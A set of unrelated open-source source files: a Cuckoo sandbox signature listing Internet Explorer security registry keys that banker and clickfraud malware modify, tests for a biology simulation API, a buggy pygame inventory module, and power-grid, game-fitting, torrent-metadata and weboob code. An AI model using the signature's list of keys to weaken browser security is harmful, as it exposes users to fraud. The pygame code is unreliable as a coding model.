# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lib.cuckoo.common.abstracts import Signature
class BrowserSecurity(Signature):
name = "browser_security"
description = "Attempts to modify browser security settings"
severity = 3
categories = ["browser", "clickfraud", "banker"]
authors = ["Kevin Ross", "Optiv"]
minimum = "1.2"
def run(self):
reg_indicators = [
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Privacy\\\\EnableInPrivateMode$",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\PhishingFilter\\\\.*",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\Zones\\\\[0-4]\\\\.*",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\Domains\\\\.*",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\EscDomains\\\\.*",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\EscRanges\\\\.*",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\ZoneMap\\\\IEHarden$",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet\\ Settings\\\\CertificateRevocation$",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Main\\\\NoUpdateCheck$",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Security\\\\.*",
".*\\\\SOFTWARE\\\\(Wow6432Node\\\\)?Microsoft\\\\Internet\\ Explorer\\\\Main\\\\FeatureControl\\\\.*",
]
for indicator in reg_indicators:
if self.check_write_key(pattern=indicator, regex=True):
return True
return False
|
igemsoftware/SYSU-Software_2014
|
tests/test_simulation.py
|
import json
from . import TestCase
class TestSimulationBase(TestCase):
def setUp(self):
self.simulations = {}
logic_type = ['repressilator', 'toggle_switch_1', 'toggle_switch_2',
'inverter', 'simple', 'and_gate', 'or_gate']
for logic_type in logic_type:
with open('tests/preprocess_%s.json' % logic_type) as fobj:
self.simulations[logic_type] = json.load(fobj)
class TestSimulationPreprocess(TestSimulationBase):
def test_preprocess_repressilator(self):
circuits = json.dumps([
{'inputs': [{'id': 1, 'promoter_id': 17, 'receptor_id': 1}],
'logics': [1], 'outputs': []}
])
result = self.client.post('/simulation/preprocess', data=circuits).json
self.assertDictContainsRecursively(result,
self.simulations['repressilator'])
def test_preprocess_toggle_switch_1(self):
circuits = json.dumps([
{'inputs': [{'id': 3, 'promoter_id': 9, 'receptor_id': 4},
{'id': 4, 'promoter_id': 20, 'receptor_id': 5}],
'logics': [17], 'outputs': [1]}
])
result = self.client.post('/simulation/preprocess', data=circuits).json
self.assertDictContainsRecursively(result,
self.simulations['toggle_switch_1'])
def test_preprocess_toggle_switch_2(self):
circuits = json.dumps([
{'inputs': [{'id': 4, 'promoter_id': 20, 'receptor_id': 5}],
'logics': [18], 'outputs': [1, 2]}
])
result = self.client.post('/simulation/preprocess', data=circuits).json
self.assertDictContainsRecursively(result,
self.simulations['toggle_switch_2'])
def test_preprocess_inverter(self):
circuits = json.dumps([
{'inputs': [{'id': 1, 'promoter_id': 17, 'receptor_id': 1}],
'logics': [7], 'outputs': [1]}
])
result = self.client.post('/simulation/preprocess', data=circuits).json
self.assertDictContainsRecursively(result,
self.simulations['inverter'])
def test_preprocess_simple(self):
circuits = json.dumps([
{'inputs': [{'id': 1, 'promoter_id': 17, 'receptor_id': 1}],
'logics': [20], 'outputs': [1]}
])
result = self.client.post('/simulation/preprocess', data=circuits).json
self.assertDictContainsRecursively(result,
self.simulations['simple'])
def test_preprocess_and_gate(self):
circuits = json.dumps([
{'inputs': [{'id': 8, 'promoter_id': 1, 'receptor_id': 12},
{'id': 9, 'promoter_id': 17, 'receptor_id': 13}],
'logics': [21], 'outputs': [1]}
])
result = self.client.post('/simulation/preprocess', data=circuits).json
self.assertDictContainsRecursively(result,
self.simulations['and_gate'])
def test_preprocess_or_gate(self):
circuits = json.dumps([
{'inputs': [{'id': 8, 'promoter_id': 1, 'receptor_id': 12},
{'id': 9, 'promoter_id': 17, 'receptor_id': 13}],
'logics': [23], 'outputs': [1]}
])
result = self.client.post('/simulation/preprocess', data=circuits).json
self.assertDictContainsRecursively(result,
self.simulations['or_gate'])
class TestSimulationSimulate(TestSimulationBase):
def test_simulation_dynamic_and_gate(self):
s = self.simulations['and_gate']
s['x0'] = {'Zinc ions': 2e-2, 'PAI': 1e-2}
s['t'] = 100
result = self.client.post('/simulation/simulate/dynamic',
data=json.dumps(s)).json
with open('tests/simulation_dynamic_and_gate.json') as fobj:
desired = json.load(fobj)
self.assertItemsAlmostEqual(result, desired)
def test_simulation_dynamic_simple(self):
s = self.simulations['simple']
s['x0'] = {'Mercury ions': 1e-2}
s['t'] = 100
result = self.client.post('/simulation/simulate/dynamic',
data=json.dumps(s)).json
with open('tests/simulation_dynamic_simple.json') as fobj:
desired = json.load(fobj)
self.assertItemsAlmostEqual(result, desired)
def test_simulation_dynamic_toggle_switch_1(self):
s = self.simulations['toggle_switch_1']
s['x0'] = {'Arsenic ions': 1e-2, 'aTc': 2e-2}
s['t'] = 100
result = self.client.post('/simulation/simulate/dynamic',
data=json.dumps(s)).json
with open('tests/simulation_dynamic_toggle_switch_1.json') as fobj:
desired = json.load(fobj)
self.assertItemsAlmostEqual(result, desired)
def test_simulation_static_and_gate(self):
s = self.simulations['and_gate']
s['c_static'] = 1.0
s['t'] = 100
result = self.client.post('/simulation/simulate/static',
data=json.dumps(s)).json
with open('tests/simulation_static_and_gate.json') as fobj:
desired = json.load(fobj)
self.assertItemsAlmostEqual(result, desired)
def test_simulation_static_simple(self):
s = self.simulations['simple']
s['c_static'] = 1.0
s['t'] = 100
result = self.client.post('/simulation/simulate/static',
data=json.dumps(s)).json
with open('tests/simulation_static_simple.json') as fobj:
desired = json.load(fobj)
self.assertItemsAlmostEqual(result, desired)
def test_simulation_static_toggle_switch_1(self):
s = self.simulations['toggle_switch_1']
s['c_static'] = 1.0
s['t'] = 100
result = self.client.post('/simulation/simulate/static',
data=json.dumps(s)).json
with open('tests/simulation_static_toggle_switch_1.json') as fobj:
desired = json.load(fobj)
self.assertItemsAlmostEqual(result, desired)
|
knipknap/SpiffWorkflow
|
tests/SpiffWorkflow/dmn/KwargsParameterTest.py
|
import unittest
from tests.SpiffWorkflow.dmn.DecisionRunner import DecisionRunner
class StringDecisionTestClass(unittest.TestCase):
"""
Doc: https://docs.camunda.org/manual/7.7/user-guide/dmn-engine/
"""
@classmethod
def setUpClass(cls):
cls.runner = DecisionRunner('kwargs_parameter.dmn', debug='DEBUG')
def test_string_decision_string_output1(self):
res = self.runner.decide(Gender='m')
self.assertEqual(res.description, 'm Row Annotation')
def suite():
return unittest.TestLoader().loadTestsFromTestCase(StringDecisionTestClass)
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
|
lepovica/Lost-Nero
|
inventory.py
|
import pygame
from vec2d import vec2d
from random import choice
ITEM_TYPES = ['weapon', 'armor', 'flask']
WEAPONS_ID = ['sword', 'axe', 'staff', 'bow']
ARMORS_ID = [
'chest', 'shoulders', 'shield', 'gloves', 'boots', 'pants', 'mantle',
'helmet', 'skirt']
FLASKS_ID = ['healt', 'armor']
SWORD_IMG = list()
AXES_IMG = list()
STAFF_IMG = list()
BOW_IMG = list()
SWORDS = dict()
for i in range(47):
SWORD_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
AXES_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
STAFF_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
BOW_IMG.append(pygame.image.load('sw'+str(i+1)+'.png'))
class Item(pygame.sprite.Sprite):
(DROPPED, GETTED) = range(2)
def __init__(self, screen, pos, img_file, item_type,
price, attack_power, deffence_power, armor, name, level):
pygame.sprite.Sprite.__init__(self)
self.pos = vec2d(pos)
self.screen = screen
self.base_image = img_file
self.image = self.base_image
self.state = self.DROPPED
self.type = item_type
self.attack_power = attack_power
self.deffence_power = deffence_power
self.armor = armor
self.price = price
self.name = name
self.level_required = level
def drop(self, pos):
self.state = self.DROPPED
def get(self):
self.state = self.GETTED
def draw(self):
item_rect = self.image.get_rect().move(
self.pos.x - self.image.get_size()[0] / 2,
self.pos.y - self.image.get_size()[1] / 2)
self.screen.blit(self.image, item_rect)
class Cell(pygame.sprite.Sprite):
def __init__(self, screen, pos, item = None, background = None):
pygame.sprite.Sprite.__init__(self)
self.pos = vec2d(pos)
self.item = item
self.screen = screen
self.background = background
self.side = 50
def is_empty(self):
return self.item == None
def draw():
if self.background == None:
self.background = Color('Black')
cell_rect = self.background.get_rect()
cell_rect.move(
self.pos.x - self.image.get_size()[0] / 2,
self.pos.y - self.image.get_size()[1] / 2)
self.screen.blit(self.image, item_rect)
class Inventory:
(WEAPON, SHIELD, CHEST, SHOULDERS, SHIELD, GLOVES,
BOOTS, PANTS, MANTLE, HELMET, SKIRT,) = range(11)
def __init__(self, screen, texture):
self.texture = texture
self.left_top = vec2d(0, 540)
self.hight = 60
self.wide = 600
self.screen = screen
self.bag_pages = 1
self.bag = [[]]
self.start_pos_bag = vec2d(0, 0)
# initial of bag
self.inverntory = list()
self.start_pos_inventory = vec2d(0, 0)
for i in range(11):
current_pos = self.start_pos_inventory
self.inverntory.append(Cell(self.screen, current_pos))
current_pos.x += 60
self.bar = []
self.start_pos_bar = vec2d(5, 545)
for i in range(9):
current_pos = self.start_pos_bar
self.bar.append(Cell(self.screen, current_pos))
current_pos.x += 60
def add_item_bag(self, item):
if self.bag_pages <= 3:
if len(self.bag[self.bag_pages]) == 9 and self.bag_pages < 3:
self.bag_pages += 1
else:
return
item.state = item.GETTED
cell_position = (self.bag_pages, len(self.bag[self.bag_pages]))
self.bag[self.bag_pages].apeend(Cell(self.screen, cell_position,
item, background))
def remove_item_bag(self, item):
deleting_pos = (item.pos.x, item.pos.y)
self.bag[deleting_pos[0]].pop(deleting_pos[1])
item.state = item.DROPPED
def add_item_inventory(self, pos_inventory, item):
if self.inverntory[pos_inventory] == None:
self.inverntory[pos_inventory] = item
else:
self.remove_item_inventory(pos_inventory)
self.inverntory.insert(pos_inventory, item)
def remove_item_inventory(self, pos_inventory):
if self.inverntory[pos_inventory] != None:
removed_item = self.inverntory[pos_inventory]
self.inverntory[pos_inventory] = None
self.add_item_bag(removed_item)
def draw(self):
step_h, step_w = self.texture.get_size()
step_h_counter = 0
step_w_counter = 0
while step_w_counter <= self.wide:
while step_h_counter <= self.hight:
self.screen.blit(self.texture,
self.left_top + vec2d(step_w_counter, step_h_counter))
step_h_counter += step_h
step_w_counter += step_w
step_h_counter = 0
def load_items(self):
for img_file in SWORD_IMG:
i += i + 1
SWORDS[str(i) + "_sword"] = type(str(i) + "_sword", (Item,), {
'pos' : vec2d(0, 0), 'screen' : self.screen,
'base_image' : img_file, 'image' : img_file,
'state' : 0, 'item_type' : ITEM_TYPES[0],
'level_required' : level,
'name' : str(i) + "_sword",
'attack_power' : level*20,
'deffence_power' : level*5,
'price' : level*100, 'armor' : level*100 })
# load more items..
def draw_inventory(self):
for cell in self.inverntory:
cell.draw()
cell.item.draw()
def draw_bar(self):
for cell in self.bar:
cell.draw()
cell.item.draw()
def draw_bag(self):
pass
|
SanPen/GridCal
|
src/research/ptdf_ts.py
|
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
from sklearn import neighbors
from GridCal.Engine import PowerFlowOptions, FileOpen, SolverType, ReactivePowerControlMode, \
TapsControlMode, BranchImpedanceMode, TimeSeries, PtdfTimeSeries, CDF, LatinHypercubeSampling
def knn_interp(X, Y, perc):
k_split = int(X.shape[0] * perc)
X_train = X[:k_split]
Y_train = Y[:k_split]
X_test = X[k_split:]
Y_test = Y[k_split:]
n_neighbors = 5
model = neighbors.KNeighborsRegressor(n_neighbors)
print('Fitting...')
model.fit(X_train, Y_train)
print('Predicting...')
Y_predict = model.predict(X_test)
print('Scoring...')
score = model.score(X_test, Y_test)
print('Score:', score)
Y_predict
def run(fname):
circuit = FileOpen(fname).open()
pf_options = PowerFlowOptions(solver_type=SolverType.NR,
retry_with_other_methods=False,
verbose=False,
initialize_with_existing_solution=False,
tolerance=1e-6,
max_iter=5,
max_outer_loop_iter=10,
control_q=ReactivePowerControlMode.NoControl,
control_taps=TapsControlMode.NoControl,
multi_core=False,
dispatch_storage=False,
control_p=False,
apply_temperature_correction=False,
branch_impedance_tolerance_mode=BranchImpedanceMode.Specified,
q_steepness_factor=30,
distributed_slack=False,
ignore_single_node_islands=False,
correction_parameter=1e-4)
nc = circuit.compile_time_series()
ts_driver = TimeSeries(circuit, pf_options)
ts_driver.run()
ptdf_driver = PtdfTimeSeries(circuit, pf_options, power_delta=10)
ptdf_driver.run()
npoints = int(len(circuit.time_profile) * 1)
lhs_driver = LatinHypercubeSampling(circuit, pf_options, sampling_points=npoints)
lhs_driver.run()
P = nc.get_power_injections().real.T
Q = nc.get_power_injections().imag.T
Pbr_ts = ts_driver.results.Sbranch.real
Pbr_ptdf = ptdf_driver.results.Sbranch.real
P_lhs = lhs_driver.results.S_points.real
Q_lhs = lhs_driver.results.S_points.imag
Pbr_lhs = lhs_driver.results.Sbr_points.real
# KNN
n_neighbors = 3
model = neighbors.KNeighborsRegressor(n_neighbors)
# model.fit(P[:40], Pbr_ts[:40])
# model.fit(P_lhs, Pbr_lhs) # just the LHS for training
# X = np.r_[np.c_[P_lhs, Q], np.c_[P, Q]]
# Y = np.r_[Pbr_lhs, Pbr_ts]
X = np.c_[P, Q][:60]
Y = Pbr_ts[:60]
model.fit(X, Y) # LHS + TS for training ("dreaming")
Pbr_knn = model.predict(np.c_[P, Q])
fig = plt.figure(figsize=(12, 8))
ax = fig.add_subplot(111)
i = 10 # branch index
ax.plot(Pbr_ts[i, :], label='Real flow', linewidth=5, c='orange')
ax.plot(Pbr_ptdf[i, :], label='PTDF', c='b', linestyle='--')
ax.plot(Pbr_knn[i, :], label='KNN', c='k', linestyle=':')
ax.set_xlabel('Time')
ax.set_ylabel('MW')
fig.legend()
plt.show()
if __name__ == '__main__':
run(r'/home/santi/Documentos/GitHub/GridCal/Grids_and_profiles/grids/IEEE_30_new.xlsx')
|
pyfa-org/eos
|
tests/integration/effect_mode/full_compliance/test_overload.py
|
# ==============================================================================
# Copyright (C) 2011 Diego Duclos
# Copyright (C) 2011-2018 Anton Vorobyov
#
# This file is part of Eos.
#
# Eos is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Eos is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Eos. If not, see <http://www.gnu.org/licenses/>.
# ==============================================================================
from eos import EffectMode
from eos import ModuleHigh
from eos import State
from eos.const.eve import EffectCategoryId
from tests.integration.effect_mode.testcase import EffectModeTestCase
class TestFullComplianceOverload(EffectModeTestCase):
def test_started_on_add(self):
effect = self.mkeffect(
category_id=EffectCategoryId.overload,
modifiers=[self.modifier])
item = ModuleHigh(
self.mktype(
attrs={self.tgt_attr.id: 10, self.src_attr.id: 2},
effects=[effect]).id,
state=State.overload)
item.set_effect_mode(effect.id, EffectMode.full_compliance)
# Action
self.fit.modules.high.append(item)
# Verification
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
# Cleanup
self.assert_solsys_buffers_empty(self.fit.solar_system)
self.assert_log_entries(0)
def test_started_on_state_switch(self):
effect = self.mkeffect(
category_id=EffectCategoryId.overload,
modifiers=[self.modifier])
item = ModuleHigh(
self.mktype(
attrs={self.tgt_attr.id: 10, self.src_attr.id: 2},
effects=[effect]).id,
state=State.active)
item.set_effect_mode(effect.id, EffectMode.full_compliance)
self.fit.modules.high.append(item)
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
# Action
item.state = State.overload
# Verification
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
# Cleanup
self.assert_solsys_buffers_empty(self.fit.solar_system)
self.assert_log_entries(0)
def test_started_on_mode_switch(self):
effect = self.mkeffect(
category_id=EffectCategoryId.overload,
modifiers=[self.modifier])
item = ModuleHigh(
self.mktype(
attrs={self.tgt_attr.id: 10, self.src_attr.id: 2},
effects=[effect]).id,
state=State.overload)
item.set_effect_mode(effect.id, EffectMode.force_stop)
self.fit.modules.high.append(item)
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
# Action
item.set_effect_mode(effect.id, EffectMode.full_compliance)
# Verification
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
# Cleanup
self.assert_solsys_buffers_empty(self.fit.solar_system)
self.assert_log_entries(0)
def test_stopped_insufficient_state_on_add(self):
effect = self.mkeffect(
category_id=EffectCategoryId.overload,
modifiers=[self.modifier])
item = ModuleHigh(
self.mktype(
attrs={self.tgt_attr.id: 10, self.src_attr.id: 2},
effects=[effect]).id,
state=State.active)
item.set_effect_mode(effect.id, EffectMode.full_compliance)
# Action
self.fit.modules.high.append(item)
# Verification
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
# Cleanup
self.assert_solsys_buffers_empty(self.fit.solar_system)
self.assert_log_entries(0)
def test_stopped_insufficient_state_on_state_switch(self):
effect = self.mkeffect(
category_id=EffectCategoryId.overload,
modifiers=[self.modifier])
item = ModuleHigh(
self.mktype(
attrs={self.tgt_attr.id: 10, self.src_attr.id: 2},
effects=[effect]).id,
state=State.overload)
item.set_effect_mode(effect.id, EffectMode.full_compliance)
self.fit.modules.high.append(item)
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
# Action
item.state = State.active
# Verification
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
# Cleanup
self.assert_solsys_buffers_empty(self.fit.solar_system)
self.assert_log_entries(0)
def test_stopped_insufficient_state_on_mode_switch(self):
effect = self.mkeffect(
category_id=EffectCategoryId.overload,
modifiers=[self.modifier])
item = ModuleHigh(
self.mktype(
attrs={self.tgt_attr.id: 10, self.src_attr.id: 2},
effects=[effect]).id,
state=State.active)
item.set_effect_mode(effect.id, EffectMode.force_run)
self.fit.modules.high.append(item)
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 12)
# Action
item.set_effect_mode(effect.id, EffectMode.full_compliance)
# Verification
self.assertAlmostEqual(item.attrs[self.tgt_attr.id], 10)
# Cleanup
self.assert_solsys_buffers_empty(self.fit.solar_system)
self.assert_log_entries(0)
|
hbiyik/tribler
|
src/tribler-core/tribler_core/modules/metadata_store/orm_bindings/metadata_node.py
|
import threading
from asyncio import get_event_loop
from pony import orm
from pony.orm import db_session, desc, raw_sql, select
from tribler_core.modules.metadata_store.orm_bindings.channel_node import LEGACY_ENTRY, TODELETE
from tribler_core.modules.metadata_store.orm_bindings.torrent_metadata import NULL_KEY_SUBST
from tribler_core.modules.metadata_store.serialization import METADATA_NODE, MetadataNodePayload
from tribler_core.utilities.unicode import hexlify
def define_binding(db):
class MetadataNode(db.ChannelNode):
"""
This ORM class extends ChannelNode by adding metadata-storing attributes such as "title" and "tags".
It implements methods for indexed text search based on the "title" field.
It is not intended for direct use. Instead, other classes should derive from it.
"""
_discriminator_ = METADATA_NODE
# Serializable
title = orm.Optional(str, default='', index=True)
tags = orm.Optional(str, default='', index=True)
# FIXME: ACHTUNG! PONY BUG! This is a workaround for Pony not caching attributes from multiple inheritance!
# Its real home is CollectionNode, but we are forced to put it here so it is loaded by default on all queries.
# When Pony fixes it, we must move it back to CollectionNode for clarity.
num_entries = orm.Optional(int, size=64, default=0, index=True)
# Special class-level properties
_payload_class = MetadataNodePayload
payload_arguments = _payload_class.__init__.__code__.co_varnames[
: _payload_class.__init__.__code__.co_argcount
][1:]
nonpersonal_attributes = db.ChannelNode.nonpersonal_attributes + ('title', 'tags')
@classmethod
def search_keyword(cls, query, lim=100):
# Requires FTS5 table "FtsIndex" to be generated and populated.
# FTS table is maintained automatically by SQL triggers.
# BM25 ranking is embedded in FTS5.
# Sanitize FTS query
if not query or query == "*":
return []
# !!! FIXME !!! Fix GROUP BY for entries without infohash !!!
# TODO: optimize this query by removing unnecessary select nests (including Pony-manages selects)
fts_ids = raw_sql(
"""SELECT rowid FROM ChannelNode WHERE rowid IN (SELECT rowid FROM FtsIndex WHERE FtsIndex MATCH $query
ORDER BY bm25(FtsIndex) LIMIT $lim) GROUP BY infohash"""
)
return cls.select(lambda g: g.rowid in fts_ids)
@classmethod
@db_session
def get_entries_query(
cls,
metadata_type=None,
channel_pk=None,
exclude_deleted=False,
hide_xxx=False,
exclude_legacy=False,
origin_id=None,
sort_by=None,
sort_desc=True,
txt_filter=None,
subscribed=None,
category=None,
attribute_ranges=None,
id_=None,
):
"""
This method implements REST-friendly way to get entries from the database. It is overloaded by the higher
level classes to add some more conditions to the query.
:return: PonyORM query object corresponding to the given params.
"""
# Warning! For Pony magic to work, iteration variable name (e.g. 'g') should be the same everywhere!
pony_query = cls.search_keyword(txt_filter, lim=1000) if txt_filter else select(g for g in cls)
if metadata_type is not None:
try:
pony_query = pony_query.where(lambda g: g.metadata_type in metadata_type)
except TypeError:
pony_query = pony_query.where(lambda g: g.metadata_type == metadata_type)
pony_query = (
pony_query.where(public_key=(b"" if channel_pk == NULL_KEY_SUBST else channel_pk))
if channel_pk is not None
else pony_query
)
if attribute_ranges is not None:
for attr, left, right in attribute_ranges:
getattr(cls, attr) # Check against code injection
if left is not None:
pony_query = pony_query.where(f"g.{attr} >= left")
if right is not None:
pony_query = pony_query.where(f"g.{attr} < right")
# origin_id can be zero, for e.g. root channel
pony_query = pony_query.where(id_=id_) if id_ is not None else pony_query
pony_query = pony_query.where(origin_id=origin_id) if origin_id is not None else pony_query
pony_query = pony_query.where(lambda g: g.subscribed) if subscribed is not None else pony_query
pony_query = pony_query.where(lambda g: g.tags == category) if category else pony_query
pony_query = pony_query.where(lambda g: g.status != TODELETE) if exclude_deleted else pony_query
pony_query = pony_query.where(lambda g: g.xxx == 0) if hide_xxx else pony_query
pony_query = pony_query.where(lambda g: g.status != LEGACY_ENTRY) if exclude_legacy else pony_query
# Sort the query
if sort_by == "HEALTH":
pony_query = (
pony_query.sort_by("(desc(g.health.seeders), desc(g.health.leechers))")
if sort_desc
else pony_query.sort_by("(g.health.seeders, g.health.leechers)")
)
elif sort_by == "size" and not issubclass(cls, db.ChannelMetadata):
# TODO: optimize this check to skip cases where size field does not matter
# When querying for mixed channels / torrents lists, channels should have priority over torrents
sort_expression = "desc(g.num_entries), desc(g.size)" if sort_desc else "g.num_entries, g.size"
pony_query = pony_query.sort_by(sort_expression)
elif sort_by:
sort_expression = "g." + sort_by
sort_expression = desc(sort_expression) if sort_desc else sort_expression
pony_query = pony_query.sort_by(sort_expression)
return pony_query
@classmethod
async def get_entries_threaded(cls, **kwargs):
def _get_results():
result = cls.get_entries(**kwargs)
if not isinstance(threading.current_thread(), threading._MainThread):
db.disconnect()
return result
return await get_event_loop().run_in_executor(None, _get_results)
@classmethod
@db_session
def get_entries(cls, first=1, last=None, **kwargs):
"""
Get some torrents. Optionally sort the results by a specific field, or filter the channels based
on a keyword/whether you are subscribed to it.
:return: A list of class members
"""
pony_query = cls.get_entries_query(**kwargs)
return pony_query[(first or 1) - 1 : last]
@classmethod
@db_session
def get_total_count(cls, **kwargs):
"""
Get total count of torrents that would be returned if there would be no pagination/limits/sort
"""
for p in ["first", "last", "sort_by", "sort_desc"]:
kwargs.pop(p, None)
return cls.get_entries_query(**kwargs).count()
@classmethod
@db_session
def get_entries_count(cls, **kwargs):
for p in ["first", "last"]:
kwargs.pop(p, None)
return cls.get_entries_query(**kwargs).count()
@classmethod
def get_auto_complete_terms(cls, keyword, max_terms, limit=10):
if not keyword:
return []
with db_session:
result = cls.search_keyword("\"" + keyword + "\"*", lim=limit)[:]
titles = [g.title.lower() for g in result]
# Copy-pasted from the old DBHandler (almost) completely
all_terms = set()
for line in titles:
if len(all_terms) >= max_terms:
break
i1 = line.find(keyword)
i2 = line.find(' ', i1 + len(keyword))
term = line[i1:i2] if i2 >= 0 else line[i1:]
if term != keyword:
all_terms.add(term)
return list(all_terms)
def to_simple_dict(self):
"""
Return a basic dictionary with information about the channel.
"""
simple_dict = {
"type": self._discriminator_,
"id": self.id_,
"origin_id": self.origin_id,
"public_key": hexlify(self.public_key),
"name": self.title,
"category": self.tags,
"status": self.status,
}
return simple_dict
return MetadataNode
|
laurentb/weboob
|
weboob/exceptions.py
|
# -*- coding: utf-8 -*-
# Copyright(C) 2014 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.tools.misc import to_unicode
from weboob.tools.compat import StrConv
class BrowserIncorrectPassword(Exception):
pass
class BrowserForbidden(Exception):
pass
class BrowserBanned(BrowserIncorrectPassword):
pass
class BrowserUnavailable(Exception):
pass
class BrowserInteraction(Exception):
pass
class BrowserQuestion(BrowserInteraction, StrConv):
"""
When raised by a browser,
"""
def __init__(self, *fields):
self.fields = fields
def __str__(self):
return ", ".join("{}: {}".format(
field.id or field.label, field.description) for field in self.fields
)
def __unicode__(self):
return ", ".join(
u"{}: {}".format(
to_unicode(field.id) or to_unicode(field.label),
to_unicode(field.description)
) for field in self.fields
)
class DecoupledValidation(BrowserInteraction):
def __init__(self, message='', resource=None, *values):
super(DecoupledValidation, self).__init__(*values)
self.message = message
self.resource = resource
def __str__(self):
return self.message
class AppValidation(DecoupledValidation):
pass
class AppValidationError(Exception):
pass
class AppValidationCancelled(AppValidationError):
pass
class AppValidationExpired(AppValidationError):
pass
class BrowserRedirect(BrowserInteraction):
def __init__(self, url, resource=None):
self.url = url
# Needed for transfer redirection
self.resource = resource
def __str__(self):
return 'Redirecting to %s' % self.url
class CaptchaQuestion(Exception):
"""Site requires solving a CAPTCHA (base class)"""
# could be improved to pass the name of the backendconfig key
def __init__(self, type=None, **kwargs):
super(CaptchaQuestion, self).__init__("The site requires solving a captcha")
self.type = type
for key, value in kwargs.items():
setattr(self, key, value)
class WrongCaptchaResponse(Exception):
"""when website tell us captcha response is not good"""
def __init__(self, message=None):
super(WrongCaptchaResponse, self).__init__(message or "Captcha response is wrong")
class ImageCaptchaQuestion(CaptchaQuestion):
type = 'image_captcha'
image_data = None
def __init__(self, image_data):
super(ImageCaptchaQuestion, self).__init__(self.type, image_data=image_data)
class NocaptchaQuestion(CaptchaQuestion):
type = 'g_recaptcha'
website_key = None
website_url = None
def __init__(self, website_key, website_url):
super(NocaptchaQuestion, self).__init__(self.type, website_key=website_key, website_url=website_url)
class RecaptchaQuestion(CaptchaQuestion):
type = 'g_recaptcha'
website_key = None
website_url = None
def __init__(self, website_key, website_url):
super(RecaptchaQuestion, self).__init__(self.type, website_key=website_key, website_url=website_url)
class RecaptchaV3Question(CaptchaQuestion):
type = 'g_recaptcha'
website_key = None
website_url = None
action = None
def __init__(self, website_key, website_url, action=None):
super(RecaptchaV3Question, self).__init__(self.type, website_key=website_key, website_url=website_url)
self.action = action
class FuncaptchaQuestion(CaptchaQuestion):
type = 'funcaptcha'
website_key = None
website_url = None
sub_domain = None
def __init__(self, website_key, website_url, sub_domain=None):
super(FuncaptchaQuestion, self).__init__(
self.type, website_key=website_key, website_url=website_url, sub_domain=sub_domain)
class BrowserHTTPNotFound(Exception):
pass
class BrowserHTTPError(BrowserUnavailable):
pass
class BrowserHTTPSDowngrade(Exception):
pass
class BrowserSSLError(BrowserUnavailable):
pass
class ParseError(Exception):
pass
class FormFieldConversionWarning(UserWarning):
"""
A value has been set to a form's field and has been implicitly converted.
"""
class NoAccountsException(Exception):
pass
class ModuleInstallError(Exception):
pass
class ModuleLoadError(Exception):
def __init__(self, module_name, msg):
super(ModuleLoadError, self).__init__(msg)
self.module = module_name
class ActionNeeded(Exception):
pass
class AuthMethodNotImplemented(ActionNeeded):
pass
class BrowserPasswordExpired(ActionNeeded):
pass
class NeedInteractive(Exception):
pass
class NeedInteractiveForRedirect(NeedInteractive):
"""
An authentication is required to connect and credentials are not supplied
"""
pass
class NeedInteractiveFor2FA(NeedInteractive):
"""
A 2FA is required to connect, credentials are supplied but not the second factor
"""
pass
|
danceos/dosek
|
app/bcc1/task1/verify_a.py
|
from generator.analysis.verifier_tools import *
def after_SystemStateFlow(analysis):
# Find all three systemcall handlers
